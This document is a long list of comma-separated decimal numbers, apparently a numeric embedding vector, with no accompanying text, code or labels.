0.006954724,0.019101787,0.033923328,-0.0037888293,-0.000042811404,0.023542956,0.00396283,-0.013167704,0.028281065,-0.0030711733,-0.019540833,0.00302172,0.023030365,-0.0061904495,-0.036079217,-0.0047890893,-0.013855124,0.010161185,-0.019451868,0.040413667,0.034810696,-0.0038027742,0.007703444,0.040933143,-0.0020116505,0.024015466,-0.0359748,-0.0031188356,-0.024141967,-0.0034524384,0.0045022434,-0.010691865,0.006581641,0.007852642,-0.014765981,0.029711924,0.009243143,0.026400175,0.014495063,-0.0014727402,0.011238397,0.011501075,-0.02517801,-0.01481455,0.0053826324,0.0040905345,0.028822724,0.02837284,-0.023172664,0.015948555,-0.00073394453,0.032755177,-0.009253128,-0.027790952,-0.0056016557,-0.030982897,0.001032745,0.01024814,-0.017876863,0.0040183347,-0.0015668962,0.008381751,0.0029311946,-0.013174662,0.02292238,-0.00007525131,0.028005904,-0.006205609,0.02521204,-0.04107208,-0.01768901,0.00051439943,0.008169939,-0.0044464823,0.014792557,-0.009529168,-0.016804047,-0.00932135,0.012344937,0.011425537,-0.018301949,0.00404904,-0.026770346,-0.0190666,0.00806556,-0.0034777378,-0.007195463,0.013121943,0.023308739,-0.0009336119,0.01484844,0.012049242,0.013962992,-0.022504538,0.028857745,-0.017065246,0.0028954342,0.02061362,-0.007408393,-0.01854988,-0.014609089,-0.012850454,0.009368045,-0.009073229,-0.009529768,0.0070594796,0.015354354,0.006744759,-0.002131374,0.01613269,-0.016743133,0.0070177875,-0.019571139,-0.016700786,0.010661631,-0.0035943887,-0.014261707,-0.0019990671,-0.038725976,0.015389227,-0.015553343,-0.018804885,0.024287883,0.09235616,0.011674432,0.00677302,0.0017147625,-0.039408177,-0.006033864,0.012496036,0.008989876,0.0036153253,0.02204842,-0.015057758,-0.012420715,0.0033853173,0.009774599,-0.037244156,0.01977301,-0.012987134,0.01022141,-0.03323739,0.00039651594,0.01297333,0.005365689,-0.0027738598,0.012544156,0.02386824,0.023672305,-0.0018811569,0.011109119,0.004068002,-0.03308352,-0.013386258,0.000050642724,-0.015407025,-0.0006426719,-0.024277272,0.010477117,0.019152582,-0.009779334,-0.007812219,-0.0038929398,0.008047214,0.0038487972,0.0055372263,-0.002791502,-0.0009862303,0.047975328,-0.00842404,-0.0026289546,-0.021549577,0.0079573,0.0042371657,0.025652183,-0.018028429,0.012742949,-0.005812766,0.029279504,0.021006737,-0.023012666,0.050645117,0.030037178,0.0050212247,0.009336712,-0.0031183125,0.0120258415,0.0010915677,0.028168062,0.007009907,0.0016195987,-0.0023634387,0.0067064194,0.0015939522,0.012628958,-0.02425016,0.014501191,-0.013016697,0.00069264136,0.015913216,-0.010758885,-0.0017141767,0.031383548,-0.009510191,0.007584144,-0.009267458,-0.014600032,-0.0050204024,0.008586919,0.0000424966,0.023326568,0.013519321,0.012531205,-0.0037769005,0.009392136,0.028754383,-0.008243871,0.023859793,0.014840214,0.024939401,0.031668767,-0.0035362784,0.0162266,0.005004329,-0.0030395957,-0.0043868083,-0.012683864,-0.010637394,-0.0042907214,0.017932389,-0.0064331624,0.011543533,0.033350278,-0.008533472,0.0050279475,-0.008274097,-0.019556154,-0.024370877,-0.03626993,-0.008717995,0.0055604605,-0.023281224,0.0026559466,0.036570426,0.0125866365,0.0007387132,0.006204858,-0.0016285565,0.018526241,-0.0006914433,-0.013457666,0.002832599,0.023414755,-0.010414706,0.028082177,0.02833335,-0.035934903,0.017736552,0.0042892024,-0.0049303276,-0.019397413,0.043354698,0.021840584,0.0051317387,0.018526483,0.03433291,-0.011886103,0.0069219023,0.020502867,0.022576826,0.00074259355,-0.011155601,-0.0032945632,-0.003191592,-0.009010771,0.0066529745,0.0040420587,0.0050165043,-0.002552375,0.018866986,-0.017743278,0.0164492,-0.01800944,0.020313539,-0.03679149,0.0040203608,0.00485418,-0.013618606,0.02565611,0.000025921427,0.06482925,-0.013029449,-0.03096913,0.01677709,0.021593057,0.011054353,-0.0063966415,0.01826604,-0.018221147,0.021708066,0.005839451,0.025380109,0.01648427,0.024864674,-0.03175039,0.010693727,-0.0052713975,-0.0077147377,-0.0058569247,-0.0053422567,0.0005662594,0.00019200638,-0.016640872,-0.032784406,-0.008305167,0.017036362,0.028212074,-0.0009859847,-0.013565435,-0.005190036,-0.03974329,-0.0046622083,0.023885924,-0.009591648,0.010471204,0.019084452,0.015631208,-0.008061283,-0.027887395,0.021115104,-0.008217676,-0.0008640433,-0.0018890952,0.023731794,0.032067828,-0.01228319,0.024399797,0.012037491,0.021888852,-0.020504445,0.012367252,0.032175567,-0.0006921443,-0.0051717707,-0.0006828174,0.014076329,0.009011096,0.004653051,-0.007400579,0.024729492,-0.0034971507,-0.008766713,-0.025655799,-0.009328914,-0.012735318,-0.0026462812,0.009593184,-0.010175122,-0.010297931,-0.013735226,0.0039344826,0.0095529,-0.000056950634,-0.0054506045,0.022871064,0.013893909,-0.0133520095,0.028895555,0.0099361865,-0.015576169,0.01528029,0.010781375,-0.004409379,0.0037519436,0.01609483,-0.0063278046,0.008952517,0.0066620633,0.013604286,-0.00075376424,-0.007928144,-0.018733678,0.016441382,-0.001037088,0.020370081,0.02052401,-0.010551762,-0.028592898,-0.01539381,-0.0015535618,-0.00037520454,-0.017148526,-0.022282425,0.022430869,-0.013584836,-0.017371703,-0.0069344756,-0.018795146,0.012564646,-0.006265012,0.030867359,-0.03875684,-0.018827127,0.0075424532,0.010226669,-0.02173666,0.03266732,0.0130537115,-0.007482533,0.011427478,-0.007671989,-0.029458782,-0.0038706402,-0.02022986,0.021982437,-0.02041738,-0.0016162898,-0.0635605,-0.014723531,-0.013301454,-0.05153445,-0.03535184,0.055417873,0.008294005,0.013952028,-0.01346279,-0.012448974,-0.03532231,0.0011632623,0.0007066162,-0.043078754,-0.006027134,0.00440542,-0.007567608,0.012209692,-0.0057248496,-0.011108289,-0.009619329,-0.015301219,0.010475028,-0.002173621,-0.002117021,-0.011282829,-0.007840904,0.030685205,-0.0040282696,0.025628757,-0.01068031,-0.0020173984,-0.001887049,0.018919894,-0.0064861355,0.00050289347,-0.023262203,0.028047265,-0.02604755,0.0018061646,-0.0066766986,0.034659922,0.017173983,-0.008136903,-0.00911863,-0.005067064,0.0024125483,-0.011990019,0.014483076,0.016258877,0.022240175,0.0138390465,0.016706465,-0.027110098,0.014006024,-0.007920594,0.017933805,-0.010171532,0.00884551,0.024971144,0.006756519,0.0045990413,0.00063940004,0.018995859,-0.007143471,-0.023703285,-0.00764246,0.027436683,0.016684301,0.028812036,0.010019071,-0.0013913895,0.010210731,0.005621499,0.00218869,0.0041518174,-0.005704532,-0.017786538,-0.0011803998,-0.009324715,-0.013581381,-0.040125385,0.01013357,-0.007128135,0.00355269,-0.009877931,-0.0010853023,-0.012833828,0.018134406,0.0097678155,-0.050389405,-0.013574801,-0.010949224,0.020537648,-0.011790167,-0.0057319906,0.004340042,0.0034692988,0.007063183,0.037642576,-0.022014251,-0.0001258873,0.014869899,-0.00956161,0.02452211,0.008788459,0.017455347,-0.0029489768,0.0013846835,-0.0135314,-0.0114884665,-0.00084828684,-0.009798625,-0.014852499,0.0027934178,0.002805499,-0.0009347281,-0.0064509707,-0.01748644,-0.0004958432,-0.0023367302,-0.027072418,-0.015672894,0.006179817,-0.013552612,-0.015267909,0.014519786,-0.03149778,0.015574206,0.024647007,-0.039302643,0.017105933,-0.03998951,0.008721444,0.028971871,0.032673422,-0.0033545124,-0.043169163,-0.035239637,0.018647134,0.007378961,0.02311595,0.012477155,-0.01703852,-0.034549754,-0.03248317,0.0028777546,-0.01610578,0.008841907,0.016964046,-0.011291114,0.030814359,-0.0289599,0.015125042,0.007337531,0.008452453,0.025085896,-0.024361683,0.01850906,-0.022096068,-0.021567056,0.035751455,-0.018152475,0.0055018933,0.03139683,-0.024163572,-0.01788347,-0.014475386,0.004523246,-0.021326978,0.01528369,0.0045425915,-0.02505543,-0.021669574,-0.008839184,-0.010151825,0.016018705,-0.025359856,-0.002757219,0.020010684,0.0066117756,-0.0006066323,0.03016985,-0.0240201,0.02606772,0.0032351476,0.0060557206,0.018461583,0.009666461,0.015852738,0.010054298,0.0052150297,-0.008169028,-0.028416764,0.02485873,-0.00015938094,-0.001684815,0.013455254,0.0056390907,0.024155436,0.0006554189,-0.008718643,-0.015857734,-0.011127066,0.026099244,-0.002655618,-0.0034583178,-0.0037583318,-0.008361244,-0.0018481481,0.012621415,0.026906174,0.005929595,0.0029095039,0.034455393,0.01882061,-0.017218716,-0.00067494693,0.014094335,-0.006023288,-0.00016333188,0.0060027977,-0.0012333058,0.016870862,0.027958902,-0.009634286,0.004523025,0.0115337465,-0.0064660385,-0.015820004,-0.014328902,0.012043479,-0.0071349572,0.009248076,0.030912766,-0.005433206,0.0013220483,-0.02299513,0.0003235693,0.004089724,-0.012395448,-0.006618387,-0.0020523095,0.0077305418,0.04312737,-0.01981073,0.013793136,0.009888637,0.014944095,-0.017579643,0.014804878,0.029474443,-0.020562284,-0.0016127018,0.015996784,0.004330933,-0.00405558,0.0051722596,-0.020145692,0.01785358,-0.00027135582,0.0009434503,0.0026979991,0.012599472,-0.023191625,0.019732362,0.014381153,-0.00931476,0.0052452595,-0.017155895,-0.047274943,-0.01570121,-0.004535143,-0.03506367,-0.016334258,0.0041439896,0.0047678538,-0.022687508,-0.019325158,0.0027361077,-0.047369443,0.012565407,-0.024684126,0.005534944,-0.014501681,0.00808146,0.0149540175,0.0058562024,0.029367909,-0.00255274,0.0067254654,0.016955538,0.031173486,0.009092553,0.014340729,-0.01342239,-0.031961624,0.014366515,0.03076079,0.0077052256,0.017301075,-0.005542387,0.016839342,0.01125145,0.03763518,-0.0041708713,-0.023651905,-0.0069209905,-0.016756864,0.02196587,0.0049358173,0.027591936,0.008154326,-0.0070337416,-0.01370808,0.0018095146,0.000013012426,0.0062389057,-0.011543008,0.024003895,-0.0048432183,-0.005798518,-0.0034252754,0.033823874,-0.019805927,-0.02089975,0.00006629261,-0.0055387905,-0.01450136,-0.0065225298,0.034293167,0.0039014136,-0.0034840603,0.010343788,-0.0035072793,0.017018382,0.00858467,0.0000558928,0.033192303,-0.0014319641,0.014960115,-0.0025521077,0.022013942,0.031046567,-0.038608,-0.010734631,-0.024242593,0.039161034,-0.005025677,-0.009706302,-0.02973662,-0.008921198,-0.01780218,-0.015082456,-0.025410311,0.0063328394,-0.005902507,-0.01240244,-0.0048863017,-0.0042176386,-0.011076355,0.02867189,-0.017716613,0.004899991,-0.031905707,-0.02944423,0.006562443,0.0057410994,-0.014929943,-0.020705165,0.0057182238,-0.0043533454,0.0039107627,0.027416175,-0.0019697866,0.022103358,-0.0005904533,0.013835542,-0.00614597,0.0071447426,0.016752737,-0.008815274,-0.008278449,0.039042268,0.00096934196,0.000925925,0.017243372,0.018793777,-0.0047088168,0.01646058,-0.0033537233,0.016756706,-0.01435576,0.007933116,0.00046719864,-0.006771304,0.0049371617,0.030511511,0.014068809,0.026424337,-0.00057117385,-0.012584704,0.017180093,0.0036785144,0.0076723965,0.02132438,0.0012863721,-0.0122038005,-0.011667233,0.0026880254,-0.0018334852,0.020276519,0.00799708,0.00095989194,0.020507216,0.0080213845,0.004041667,-0.026181249,-0.007366688,-0.0076306937,-0.021294076,0.006654241,-0.013543541,0.0086139785,-0.0117934225,-0.012292615,-0.0072895903,0.02194221,0.018522223,0.008801141,0.0026963917,0.02411154,-7.8087805e-7,-0.0010143837,-0.027185373,-0.018406438,0.0023168938,-0.0021660717,-0.008892207,0.0026173124,0.008372774,-0.032579575,0.0073342235,0.0043239905,-0.03102542,0.018881273,-0.0056782886,-0.0071060355,-0.02303318,-0.013585135,-0.0057110344,0.008589901,-0.00523161,0.01402984,-0.007120848,-0.021974226,0.025799595,0.012011792,-0.0010990741,0.016689524,-0.021153294,0.04042239,0.02271421,-0.020983867,0.0027494575,0.007047322,0.009229649,-0.016201606,-0.019574104,-0.011204277,0.012686412,-0.01266145,0.015851377,0.004351462,-0.002663625,0.024630263,-0.022791816,0.03780417,0.01136,-0.035255704,-0.008793882,0.009364672,0.006802342,0.029873569,-0.011752798,0.019989222,0.006949652,-0.05257209,0.004068877,0.00508925,-0.016948493,-0.0061278245,0.013864891,-0.008723368,-0.012316997,-0.009520254,-0.023699189,0.008797759,0.014006587,-0.021780621,0.010361395,0.0344905,-0.0038284438,0.0162984,0.0030379312,-0.0074375067,0.031906366,0.027162217,0.004054058,-0.006142204,0.01391455,-0.0012061736,0.025326839,0.019626245,-0.013569576,-0.018966202,-0.017478736,-0.004009786,-0.028945135,-0.03617409,0.01458234,-0.004785192,0.015977057,-0.014209051,-0.007650531,0.024404332,-0.01387644,-0.000047463596,0.0035953247,0.029693676,-0.024023673,-0.0042642932,0.0127845295,0.022118373,0.0051916926,-0.013525486,-0.040975653,-0.0244801,-0.008371075,-0.009496823,-0.03312063,0.0029942286,-0.011002617,-0.007772348,-0.005955777,-0.0005049013,-0.0011547534,0.0019632992,0.014802465,0.005444597,-0.010681316,0.006177493,0.0006944982,0.00639532,0.0028554548,0.009008656,0.0024544431,-0.008978028,0.00879983,0.013073136,0.010775628,0.0050141215,0.018791884,-0.024576481,0.013819475,0.014665614,0.013272775,-0.018999342,0.006942723,0.0028282774,-0.026880875,-0.0065186545,0.012822864,0.0022600412,0.0034426148,-0.00000801908,-0.004093626,-0.015557481,0.010436547,-0.019313904,0.08343275,-0.0009238765,0.0019111359,-0.006289046,0.010767051,-0.035965603,0.021869706,0.015650816,-0.0019613258,-0.019515706,-0.023572074,-0.015756909,-0.03000456,-0.0025897627,0.021064099,-0.008776461,-0.0037233457,0.014784294,0.0034270184,0.0036014614,0.0015468118,0.0048020687,0.0014702538,-0.008756438,-0.0061182664,0.02636258,0.010365293,-0.0076176957,0.0145265,-0.012852878,0.006526825,-0.014804488,0.0013871307,0.0034304927,-0.014433957,0.012058249,0.009430608,-0.008546662,-0.019474389,-0.004413533,0.009484181,-0.018951815,0.015792329,-0.00087357895,0.029806677,-0.011735855,-0.00208894,-0.028760165,0.009217707,-0.006507111,0.021218648,-0.0047255764,-0.018484373,-0.0062429733,-0.017544836,-0.001459149,-0.0022711402,0.01879643,-0.0058128834,-0.007607849,-0.0075776963,0.012369884,0.0073943897,-0.020125905,0.0121145155,0.008456262,0.0058083558,-0.011196516,0.010007247,-0.016732635,0.0013506153,-0.02551191,0.016144203,-0.0066312165,-0.002444471,0.006937854,0.014189311,-0.0051249666,-0.022345502,-0.018572254,-0.008858338,0.020784117,0.034040716,0.010390781,-0.012230648,0.012666876,-0.0050640777,0.0042716586,0.052699964,0.011912644,0.018634688,0.0054713883,0.0107698,0.030865956,0.010531171,0.02131287,0.010759281,0.011013065,-0.020979332,0.03264179,-0.015748393,-0.00018017419,0.026958432,-0.019422408,0.011420368,-0.010001877,-0.007888261,0.004891562,-0.0009745301,0.025740784,0.031778667,-0.0024136424,-0.004501116,0.0027038862,-0.0097925505,-0.01485435,0.018100863,0.013807771,0.017504351,0.012212221,0.022882164,0.021506418,0.004169582,-0.02976948,0.008134054,0.0714953,0.011692538,-0.0008150224,0.022916019,0.010752658,0.016876245,-0.090604685,0.0022047462,0.0023863607,0.015626553,-0.0004461581,-0.0011129414,-0.00652767,0.019340992,0.004863482,-0.039545793,-0.005290892,-0.02697,0.029208275,-0.013587391,-0.0027212258,-0.018834691,-0.0038502142,0.0090796575,-0.028571423,-0.014696635,0.00740224,0.0020373368,-0.0043458166,-0.0051367916,0.0041225776,-0.01922281,0.023169108,-0.03662314,-0.030348953,0.01930588,0.0176456,0.0011053182,-0.013269869,0.008948814,0.020242581,0.020362152,-0.006607979,-0.024887653,-0.12094494,-0.0022996252,0.022254793,-0.031747524,0.017925268,-0.01193247,-0.011419293,-0.004846726,0.026779456,-0.007173461,-0.016508617,0.0089432355,-0.030689858,0.010582922,-0.022474824,0.012382272,-0.00840753,0.009936617,0.01643995,0.00614589,0.012699737,-0.03292169,0.00859613,-0.02231726,-0.024278002,0.011845663,0.018858302,0.021589704,0.008903086,-0.0016729474,0.0003871315,-0.004594662,-0.016464286,0.005997397,-0.029239118,-0.013425165,-0.021531403,0.002463761,-0.015375681,0.04716925,-0.0037918945,-0.008980639,-0.01869903,0.0015776661,0.008742223,0.020518793,0.024666216,0.00649791,0.0017642027,0.015002376,0.025738632,-0.010220995,-0.0066020773,-0.0041481736,0.015590599,0.003051034,-0.0055820686,-0.014454715,-0.012543639,0.0117177935,-0.015533653,-0.025433287,-0.0060495124,-0.017147696,0.023205439,-0.018293172,0.0125633245,-0.036081407,-0.014947186,-0.002385318,-0.009295629,0.010682597,0.018678393,-0.005821887,0.021198021,-0.0020008648,-0.017186863,0.012663952,0.019948455,-0.0064656674,0.021469455,-0.0037051684,0.0064967657,-0.026750408,-0.0003234491,-0.0057917316,-0.007437109,-0.0066044293,-0.0057018683,-0.005624149,0.02413689,-0.030630274,0.0068051834,-0.0038639018,0.01711649,0.00095101754,0.028292121,-0.015309261,-0.022665959,0.009836642,0.008820845,0.0044489643,-0.027405877,-0.00096158445,-0.00051411055,0.014108985,-0.00087076036,-0.02140373,-0.014421942,0.0035814336,-0.0026887618,-0.024308322,0.020748442,0.018454434,-0.034200616,-0.008642084,-0.008924735,-0.01102747,0.018668534,-0.0019432333,-0.018473208,0.013366567,-0.024104731,-0.00050175417,0.0075440896,0.030633928,-0.042236365,-0.0064917826,-0.0072224042,0.03251498,-0.025264947,-0.01426544,-0.010329456,0.0075252727,0.0068483273,-0.0059219324,-0.01912823,0.0057106186,-0.024316402,-0.011736274,-0.0050147627,0.01368896,0.0011635664,0.0145517215,0.015954409,-0.016757255,0.05435215,0.0037216265,0.0093802605,0.006266865,0.01394823,0.007971698,-0.0134818945,-0.029142426,0.00037537538,0.035250325,-0.0045029414,-0.008194582,0.019626847,0.005889121,0.013330493,0.031195998,-0.016572211,-0.016755043,-0.007216972,-0.026021214,0.011850787,-0.00878818,0.014019641,-0.01893552,0.010865822,0.023601316,0.009667684,-0.00865012,0.0026074883,0.019354826,-0.014554773,-0.006426718,0.00585961,0.029064473,-0.008019177,0.027750652,0.013670854,0.0037812046,0.00013583648,-0.0049276873,-0.025314286,0.0058281063,0.0044714003,0.00014337014,-0.029724764,-0.026831057,-0.012137981,0.012742806,-0.00013332268,0.018851036,0.023364302,0.00881048,-0.024153793,-0.0053605842,-0.027293978,0.00036815708,0.00395136,0.003095968,0.0005905972,0.009100745,0.018043544,0.0025487912,-0.013468188,-0.002543616,-0.0038408956,-0.011955508,0.01105223,0.012067649,-0.02250244,-0.008950315,-0.015170794,-0.0012137585,-0.0068101916,-0.012289496,-0.007834524,-0.0047530923,-0.004901676,-0.009183931,0.007783317,-0.016887065,0.0057609444,-0.04683266,-0.024559436,-0.004712839,-0.00807144,-0.020096103,0.0024061087,-0.0073952256,0.027412836,0.0075689154,0.0030027041,0.018000096,-0.014909719,-0.020966774,-0.027321903,-0.017994517,0.04100517,-0.019164013,0.018538069,0.021662792,0.004937598,0.013169115,-0.00042124075,0.013275995,0.027337663,0.020062167,0.009148153,0.03371181,-0.0043712673,-0.011050136,0.009606667,-0.00835357,-0.013099076,-0.0026337476,-0.0136637,-0.0015636121,0.01661545,0.026334576,-0.024717588,0.013443707,-0.02460539,0.014342954,-0.034235075,-0.004079757,0.042667408,-0.0033875548,0.022705523,0.042735294,0.0076966938,-0.008395178,0.031905107,-0.0020583454,-0.010341032,0.020594312,-0.014136957,-0.007864617,0.004429029,-0.018493215,0.02778164,-0.010293657,0.02529509,0.020377325,-0.00039160321,-0.018967781,-0.011674045,0.013414908,0.023530591,0.0027200931,0.0246352,-0.025365416,-0.015603292,0.008270337,0.00059494626,0.010540058,-0.0012587159,0.0013164232,-0.009098607,-0.038334616,0.008849621,-0.022681367,0.023965431,-0.014454694,0.029247075,0.022159403,-0.0017178896,0.0061391504,-0.030814167,-0.015890922,0.0020885419,0.0025438294,0.02576886,0.0027231146,0.006996937,-0.01771812,0.035133805,0.025988983,-0.0012059931,0.020151542,0.0024874136,-0.0066255,-0.012179041,0.0062939487,0.00039041942,0.00953831,-0.027115531,-0.0056697093,0.013900002,-0.017437907,-0.026311068,0.00070712704,0.0031397503,0.006834588,-0.0016970672,0.0064181853,0.011149052,0.01888379,0.03830065,-0.0054413066,0.0055732485,0.0009920296,-0.0031050283,-0.010517773,-0.013195883,-0.010807741,0.0051095677,0.020299722,-0.019318568,-0.0016416005,0.00831968,0.00027847156,0.02011154,-0.026527641,-0.027081136,-0.0017892348,-0.014719746,-0.003380613,-0.018940918,0.0041817324,0.0041503455,0.010655868,0.009943192,-0.0017565036,0.0070257303,-0.0050374917,-0.007238266,-0.011488322,0.017137093,-0.0080903,-0.03178991,0.0007897938,0.001319361,-0.00031431354,0.010330587,0.00069471536,-0.0026230153,-0.017771872,0.058444608,-0.016924735,0.010244906,-0.008426059,0.01739772,0.014816541,-0.018955309,0.0061592357,-0.02963241,-0.0095569985,-0.0060512135,-0.021873219,0.007412748,0.008056724,-0.041173287,-0.020361207,0.011895752,0.0079869935,-0.0044211564,0.001814103,0.0209538,-0.0025361606,0.02481843,-0.0014436811,-0.019716114,-0.05764782,-0.0012298768,0.00019088625,-0.0209592,0.0054357066,0.027334077,0.0029242495,-0.017373715,0.00061594154,-0.012385852,0.0014464161,-0.025265418,0.010549154,0.012963811,0.016083261,0.01595444,0.011584245,-0.0017777764,-0.010930299,-0.022876784,-0.017260706,-0.0025144923,-0.0022775447,-0.023764038,0.00920122,0.0132685425,0.00024802782,0.014054553,0.010063597,-0.009334565,0.010751007,0.004385803,-0.011730345,0.018501526,-0.0062968577,0.021648627,-0.008064302,-0.03724075,-0.0118451845,0.022626778,0.0123283025,-0.0052695572,-0.020294525,-0.015669964,-0.026143895,-0.00303228,0.0023249348,0.00033945785,0.013228563,-0.0010973201,0.011162543,-0.0012470353,-0.005222215,-0.0036383055,0.01922644,-0.018945811,0.012276208,-0.0052679637,-0.011636533,-0.0025006074,0.020529829,-0.017821694,0.010682212,-0.0005113663,0.023408726,0.03061857,-0.002159611,0.02431435,0.012013278,-0.015636979,0.004951747,0.002700461,-0.02547036,0.006011153,-0.012767015,-0.029588958,-0.0017382599,0.0055721304,-0.0019345705,-0.00906392,0.0066667483,-0.07576333,0.025967803,-0.009807739,-0.020195648,0.0014869578,-0.020499835,0.0065121036,0.025806181,-0.0123562645,-0.042408124,-0.012132213,0.033472206,0.013672227,-0.020340078,0.0071391957,-0.014589146,-0.025101159,-0.000590797,0.0020458088,0.01002863,0.014193224,-0.015469033,0.0008409645,-0.016354231,0.008822272,-0.0005603185,0.010767041,0.010992367,0.004619022,0.011706731,-0.0030363235,-0.014416899,0.004684473,0.014756947,0.0009686028,-0.010951711,-0.009580434,0.013529013,-0.0005698029,-0.010923492,0.0059646512,-0.0018386041,0.013604529,-0.002699957,0.0034517762,-0.00646318,0.0020699752,0.030421814,0.000865191,0.03324124,-0.0070058936,-0.00015430272,0.004445046,0.0008699779,-0.009387031,-0.007824609,0.0037168735,0.006984489,0.004592252,0.002159745,-0.018489627,-0.011602226,0.0041372855,-0.02374261,-0.006046201,0.004714002,0.021843934,-0.0047162734,-0.032230996,0.008295771,-0.02161072,0.009774521,-0.007910077,-0.010437406,0.0013045066,0.0060248785,0.005636408,0.008808358,-0.01979873,0.011834003,-0.026088616,-0.0075991238,0.011373224,0.028982861,0.0006178574,-0.022336775,-0.0033860747,0.019451361,-0.0098085655,0.02025893,0.0038980644,-0.0094207795,-0.022546511,-0.029290231,-0.0061070556,0.014330749,0.0050893407,0.01991179,-0.009922175,-0.008485931,0.00024437637,0.008491683,0.0032112387,-0.010235301,-0.09504649,-0.019451793,0.021107353,-0.021282872,0.011874468,-0.018642662,0.030034058,0.0075783,0.023610491,0.016308201,-0.02666099,-0.004755387,-0.018047417,-0.0031108279,0.0073878192,0.013987749,-0.03330741,-0.0025778166,-0.005217874,-0.0059086485,-0.001122105,-0.02737968,0.012863578,0.021120954,0.012615071,0.00593303,0.009923383,0.024769928,0.010964134,0.0066104326,0.00043907182,0.009718478,-0.0019848496,0.021369904,-0.03772564,-0.0023555995,-0.0047547845,-0.023026621,-0.002413826,-0.013237104,0.0029035038,-0.0088837845,0.0019192997,0.016083205,0.008938262,-0.0069968794,-0.005597338,0.025768736,-0.00947699,-0.008111015,0.022689221,0.0036617739,0.009461824,-0.0039912276,0.008847293,-0.015592788,0.0029355076,0.023449281,0.017386725,-0.01114947,-0.017137459,0.0068199276,-0.039008323,0.011261824,-0.016716644,0.018670691,0.0028733155,0.014406113,-0.004242622,0.013056619,-0.009452168,0.028237946,-0.00037878673,-0.011567165,0.021710757,-0.0008713447,0.005124986,0.023402153,-0.008697401,-0.005842124,-0.00023276683,-0.024655316,0.0015614108,0.00092738814,-0.018334027,0.026877284,-0.016735252,0.01201943,-0.015335005,-0.0009862927,0.0067000627,0.015500991,-0.012082331,0.025664665,-0.003865642,0.008767087,0.051499236,0.004581667,-0.00922756,0.011755823,-0.0038602878,-0.0053725103,-0.007068706,-0.00012882141,-0.026315283,0.041751396,0.01981772,-0.0061581,0.011597922,-0.0048078494,-0.012044843,0.015209065,-0.019345343,0.0015961159,0.015715772,0.0077341744,-0.02160962,0.0330891,0.005108276,0.0047393353,0.0066953828,0.013345937,-0.016836232,-0.03270387,-0.02497306,-0.018859044,-0.019109631,0.016706116,-0.01241567,-0.009365808,-0.01065956,0.012504384,0.016888216,-0.0071776616,0.013950353,0.008824164,-0.0007391956,0.01363034,-0.0022516097,-0.0002421599,0.0027403466,0.008133137,-0.010770883,0.0056764926,0.01164011,0.006926216,-0.034866422,-0.009413528,-0.011154527,0.009337915,-0.007277371,0.0030848514,0.021655593,0.0012090368,0.01142691,0.00863974,0.002971861,-0.0014538215,0.004544754,0.020874735,-0.0037201936,0.0215027,0.03899129,0.013161579,-0.009042993,-0.0097585665,-0.0045795613,-0.010434055,-0.011490358,-0.003792301,0.020512292,-0.002277277,0.027519902,-0.062593326,0.011528454,-0.0076743355,0.01786208,0.0044890884,0.024256192,0.016777238,0.0003599641,-0.0029923103,-0.0057560713,-0.007002555,0.0030830223,0.01721272,0.0014416168,-0.023580382,-0.015959902,-0.033430945,0.0427081,0.002756115,0.01589692,-0.017691791,0.006217861,0.008256253,0.0030164416,-0.0027731075,0.014320383,0.0049760547,-0.02546893,0.014800162,0.0054162685,-0.023963323,0.026239619,-0.0012230383,0.0018598587,0.015952688,0.00013151251,-0.0071167196,-0.016092071,0.0052689044,-0.015685754,-0.009588694,0.004077662,0.013826259,-0.008929883,-0.015322143,0.025021946,0.0048637255,-0.022219388,-0.027395954,0.008633666,-0.0052178423,-0.019102227,0.041789588,0.022102647,0.007500757,-0.020355439,-0.017348215,-0.011144296,0.000028302982,-0.010329562,0.011861891,0.0007066458,0.011325262,0.032729916,0.020535251,0.012694013,-0.0022741426,0.029940585,0.009452059,0.026066117,0.024166461,0.025221456,0.024457246,0.0008085509,-0.012233685,0.016381055,0.02932227,0.008773912,-0.0037075803,-0.017252743,-0.008871806,-0.0049281223,0.005284179,-0.01431325,0.00676248,-0.008375818,0.016880222,-0.015764225,0.011124144,-0.035397757,0.012357354,0.0024730843,0.00936698,0.017562617,-0.026975878,-0.012022256,-0.013630342,0.0048959567,0.012402763,-0.01472962,0.036093883,-0.010553845,-0.011328515,0.00096768513,0.00045932122,0.010871154,-0.013719195,-0.0029800448,-0.0030518433,-0.01081942,0.029797047,0.010389222,0.010103562,0.008301321,0.016313724,-0.0142502105,-0.017150128,0.030266732,0.0010066767,0.011889994,0.012670201,-0.004373874,-0.0040098536,0.011441361,-0.0049878797,0.017128576,0.020858034,0.027586142,-0.038778763,0.0026581506,-0.002012272,0.0079958765,0.0019681933,0.0087975385,0.022359611,0.015714249,-0.01922209,-0.011030676,0.015052501,-0.012525251,0.032721773,0.0046688644,0.0055854334,0.00007223586,-0.015476258,-0.033271566,-0.0006427578,-0.0020499816,-0.017368512,0.030488681,-0.003192955,-0.0047746096,0.0014162933,0.019540235,0.023013383,-0.011607818,0.0040806034,0.03224592,-0.0055312645,-0.008233933,-0.0023644716,0.019415764,0.0033699735,0.0022972734,0.039129622,-0.007905538,0.024096332,-0.0063868933,0.009813079,-0.012793269,0.01300558,0.0198928,0.013903887,-0.009467869,-0.0010181483,0.003778912,0.011581117,0.003632858,0.005659852,0.014559226,-0.008218389,-0.013215233,0.027708394,-0.039719414,-0.006809839,-0.0033970785,0.028282417,-0.021648733,0.024945589,0.008713632,0.0052319393,-0.000117312666,0.0061096353,-0.041671418,0.007930574,-0.036886033,0.0061146547,0.00014569485,0.017480286,-0.024393342,-0.042241506,-0.0011931695,-0.070038736,-0.010644251,0.023294892,0.004640741,0.02614999,-0.02569746,-0.022456601,-0.015754342,0.010072266,0.014065607,0.0010619767,-0.019753957,-0.014899615,-0.0022934265,0.044615194,-0.0010681633,-0.015482874,-0.0068502473,0.01032298,-0.040226456,0.014386674,0.008508023,-0.019723075,-0.0029750674,0.010964801,0.016243702,0.0041392175,0.0049626012,0.021328101,-0.0010848797,-0.010588507,-0.003767742,0.0026380257,-0.0022762963,-0.022883838,0.007968888,-0.0062729153,0.0142973475,-0.014404201,-0.030310903,-0.0023144279,-0.002854879,-0.0055944985,0.007427253,-0.02473167,0.008752746,-0.025369802,-0.0005634744,-0.025904749,-0.0146957,-0.029507767,0.021499647,0.0066228155,0.035138194,0.00402276,0.008896123,-0.009581595,-0.0050147395,0.035482045,0.0033243985,-0.0039477963,0.00004839159,0.009891518,0.008802,-0.007884329,0.0075435,0.0075393245,0.000012455831,-0.0072101103,0.017067347,0.020008221,-0.023326674,-0.019815084,-0.009284748,-0.011274508,0.004441336,0.006241417,-0.010891605,-0.018137228,-0.0027101673,0.03409433,-0.010790275,0.031928558,0.008065301,0.0003879712